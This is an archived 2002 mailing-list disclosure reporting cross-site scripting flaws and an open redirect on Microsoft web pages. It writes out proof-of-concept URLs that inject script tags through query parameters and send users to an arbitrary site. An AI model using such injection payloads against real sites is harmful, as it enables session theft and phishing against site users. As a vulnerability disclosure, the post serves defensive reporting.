*.microsoft.com bugs

From: frog frog (leseulfrogat_private)
Date: Wed Jan 09 2002 - 06:30:07 PST

  • Next message: Walter Park: "mebbe I missed something? Re: cgate soli86"

    
     ('binary' encoding is not supported, stored as-is)
    I've already send this bug :
    
    http://www.microsoft.com/freedomtoinnovate/inc/send
    friend.asp?sAddress="><script>alert('Microsoft%
    20hole')</script><"by%20frog-m@n
    
    There is 2 others cross scriptings bugs :
    
    http://www.microsoft.com/jobs/search/processCriteri
    a.asp?msid1=1047112&msid2=-
    613922157&msid3=<script>alert('test')
    </script>&msid4=451143745
    
    and in 
    http://www.microsoft.com/jobs/search/keywords.asp .
    
    There is a bad redirect script too :
    
    http://support.microsoft.com/default.aspx?
    scid=http://where.to.go
    
    Crosoft has been alerted...
    
    frog-m@n
    



    This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 07:58:57 PST